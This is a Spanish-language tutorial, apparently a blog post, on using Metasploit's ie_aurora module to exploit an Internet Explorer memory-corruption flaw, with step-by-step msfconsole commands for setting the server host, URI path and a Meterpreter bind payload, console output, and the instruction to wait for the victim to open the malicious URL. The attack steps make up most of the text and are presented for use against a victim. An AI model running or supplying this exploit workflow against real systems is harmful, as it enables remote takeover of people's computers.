Descargad el Exploit IE_Aurora.rb de Metasploit Framework – /modules/exploits/windows/browser/ie_aurora.rb – Metasploit Redmine Interface. Ponemos el Exploit dentro de la carpeta que nos de la gana, yo la puse en Windows/Browser/Ie_Aurora. Ingresamos a la Consola del Metasploit y cargamos el Exploit Ie_Aurora
_ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | / _ ) _)/ _ |/___) _ | |/ _ | | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|____)___)_||_(___/| ||_/|_|___/|_|___) |_| =[ metasploit v3.3.3-release [core:3.3 api:1.0] + -- --=[ 481 exploits - 220 auxiliary + -- --=[ 192 payloads - 22 encoders - 8 nops =[ svn r7957 updated 27 days ago (2009.12.23) Warning: This copy of the Metasploit Framework was last updated 27 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://dev.metasploit.com/redmine/projects/framework/wiki/Updating msf > use windows/browser/ie_aurora msf exploit(ie_aurora) >
Miramos que opciones tiene y cuales son requeridos
msf exploit(ie_aurora) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Automatic msf exploit(ie_aurora) >
Llenamos los parametros de SRVHOST, URIPATH y Seleccionamos el PAYLOAD.
msf exploit(ie_aurora) > set SRVHOST 192.168.0.2 SRVHOST => 192.168.0.2 msf exploit(ie_aurora) > set URIPATH / URIPATH => / msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ie_aurora) >
Lanzamos el Exploit y esperamos a que la victima ingrese a la URL.
msf exploit(ie_aurora) > exploit[*] Exploit running as background job. msf exploit(ie_aurora) > [*] Started bind handler[*] Using URL: http://192.168.0.2:8080/[*] Server started.
[youtube=http://www.youtube.com/watch?v=4o8UPTEU_Uo&feature=player_embedded]
Se debe a: a que cuando un usuario carga manualmente un sitio Web, código JavaScript especialmente conformado provoca una corrupción de memoria que en última instancia permite el acceso al sistema. Esta vulnerabilidad es extremadamente crítica, y el código lleva circulando libremente por Internet desde hace un par de días, lo que hace más que posible que el exploit, que en principio se diseñó para el robo de propiedad intelectual en un ataque segmentado contra grandes corporaciones, pueda estar explotándose de un modo más generalista.